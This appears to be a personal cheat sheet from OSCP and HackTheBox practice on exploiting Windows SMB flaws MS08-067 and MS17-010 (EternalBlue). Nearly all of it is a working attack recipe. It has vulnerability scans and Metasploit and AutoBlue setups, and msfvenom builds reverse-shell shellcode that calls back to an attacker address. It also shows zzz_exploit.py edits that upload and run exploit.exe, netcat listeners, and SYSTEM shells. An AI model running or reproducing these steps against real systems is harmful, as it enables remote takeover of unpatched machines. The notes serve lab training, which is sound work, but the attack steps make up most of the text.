---------------------
nmap search and test:
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
> grep smb /usr/share/nmap/scripts/
.. smb-vuln-ms08-067.nse
> nmap --script vuln
> nmap --script smb-vuln $IP -Pn -p 445
> nmap --script smb-vuln* $IP -p 139,445
> nmap --script smb-vuln-ms08-067 $IP -Pn -p 445
> nmap --script smb-vuln-ms17-010 $IP -sV -p 445
Host script results:
| smb-vuln-ms08-067:
| smb-vuln-ms17-010
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| IDs: CVE:CVE-2017-0143
Eternal Checker
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue
> python3 eternal_checker.py $IP
[*] Target OS: Windows 5.1
[!] The target is not patched .. Vulnerable!!!
Eternal Blue - Metasploit
> sudo msfconsole
> search ms08-067
> search ms17-010 ..better
set payload windows/x64/meterpreter/reverse_tcp
use ms08_067_netapi
use ms17_010_eternalblue ..better
set rhost $IP
set lhost $MyIP
show options
exploit
meterpreter > cd C:\Documents and Settings\john\Desktop
meterpreter > cat user.txt
Flag !!!
AutoBlue - Metasploit
Auto-merge - with Metasploit
-----------------------------------
Prep:
cd shellcode
./shell_prep.sh
Auto generate a reverse shell with msfvenom? (Y/n) Y
LHOST for reverse connection : 10.10.14.128
LPORT you want x64 to listen on: 4444
LPORT you want x86 to listen on: 6666
Type 0 for meterpreter shell 1 for regular cmd shell: 1
Type 0 staged payload or 1 for stageless payload : 0
Generating x64 cmd shell (staged)...
msfvenom -p windows/x64/shell/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.128 LPORT=4444
Saved as: sc_x64_msf.bin
Generating x86 cmd shell (staged)...
msfvenom -p windows/shell/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.128 LPORT=6666
Saved as: sc_x86_msf.bin
MERGING SHELLCODE WOOOO!!!
DONE
-----------------------------------
Listener:
> ../listener_prep.sh
LHOST for reverse connection : 10.10.14.128
LPORT for x64 reverse connection: 4444
LPORT for x86 reverse connection: 6666
Enter 0 for meterpreter shell or 1 for regular cmd shell: 1
Type 0 for staged payload or 1 for a stageless payload : 0
Metasploit Starts:
Starting listener (staged)...
Starting postgresql (via systemctl): postgresql.service==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-units ===
=[ metasploit v5.0.88-dev ]
+ -- --=[ 2014 exploits - 1097 auxiliary - 343 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
[*] Processing config.rc for ERB directives.
resource (config.rc)> use exploit/multi/handler
resource (config.rc)> set PAYLOAD windows/x64/shell/reverse_tcp
resource (config.rc)> set LHOST 10.10.14.128
resource (config.rc)> set LPORT 4444
resource (config.rc)> set ExitOnSession false
resource (config.rc)> set EXITFUNC thread
EXITFUNC => thread
resource (config.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.128:4444
resource (config.rc)> set LPORT 6666
resource (config.rc)> exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.128:6666
msf5 exploit(multi/handler) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler windows/x64/shell/reverse_tcp tcp://10.10.14.128:4444
1 Exploit: multi/handler windows/shell/reverse_tcp tcp://10.10.14.128:6666
------------------------------------
Was there another command to run? (I dont remember)
Connected!
If you are lucky, this might work without custom payload
Needs to have pipe known/exposed and guest/anonymous
Ex: legacyHTB..worked blueHTB..failed
> python3 zzz_exploit.py $IP
[*] Target OS: Windows 5.1
[+] Found pipe 'browser' ..pipe was known
[+] Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x820f3240
SESSION: 0xe10855a8
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
[*] make this SMB session to be SYSTEM
[+] current TOKEN addr: 0xe2148030
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe21480d0
[*] overwriting token UserAndGroups
[*] have fun with the system smb session!
[!] Dropping a semi-interactive shell (remember to escape special chars with ^)
[!] Executing interactive programs will hang shell!
C:\WINDOWS\system32>whoami ..system
Exploit7 - No MSF - Manual Merge
Create 32 and 64bit payloads. Then Merge.
This Method will skip the "Named Pipes" headache
Exitfunc means less chance of crash
nasm -f bin ./shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
msfvenom -p windows/x64/shell_reverse_tcp lport=443 lhost=$IP --platform windowx -a x64 --format raw -o sc_x64_payload.bin EXITFUNC=thread
cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin
nasm -f bin ./shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
msfvenom -p windows/shell_reverse_tcp lport=443 lhost=$IP --platform windowx -a x86 --format raw -o sc_x86_payload.bin EXITFUNC=thread
cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin
python3 ./shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
python3 eternalblue_exploit7.py $IP sc_all.bin
nc -nlvp 443
whoami ..system
AutoBlue - No MSF - zzz_exploit.py - Named Pipes
Custom Payload. No Metasploit.
zzz_exploit.py
Needs: mysmb.py
auxiliary/scanner/smb/pipe_auditor .. Not allowed on OSCP
pipes = [ 'browser', 'spoolss', 'netlogon', 'lsarpc', 'samr' ] ..check the code for this!
Ex: blueHTB
Payload
msfvenom -p windows/shell_reverse_tcp lhost $MyIP lport 4444 -f exe > exploit.exe
vi zzz_exploit.py
USERNAME = '//' .. Anonymous authentication
PASSWORD = '' .. User/Pass if you have one
print('creating file c:\\exploit.exe on the target')
fid2 - smbConn.createFile(tid2, '/exploit.exe')
smb_send_file(smbConn, '/full/path/exploit.exe', 'C', '/exploit.exe')
service_exec(conn, r'cmd /c c:\exploit.exe')
nc -nvlp 4444
python zzz_exploit.py
python zzz_exploit.py <ip> [pipe_name]
python zzz_exploit.py 10.x.x.x .. pipe Problem
msfconcole .. not allowed for OSCP
search pipes .. get pipe_name
use 0
use auxiliary/scanner/smb/pipe_auditor
options
set rhosts 10.x.x.x
run
\samr \ntsvcs \lsass \netlogon \browser .. found Pipes
python zzz_exploit.py 10.x.x.x samr
nc -nvlp 4444
C:\WINDOWS\system32>whoami .. system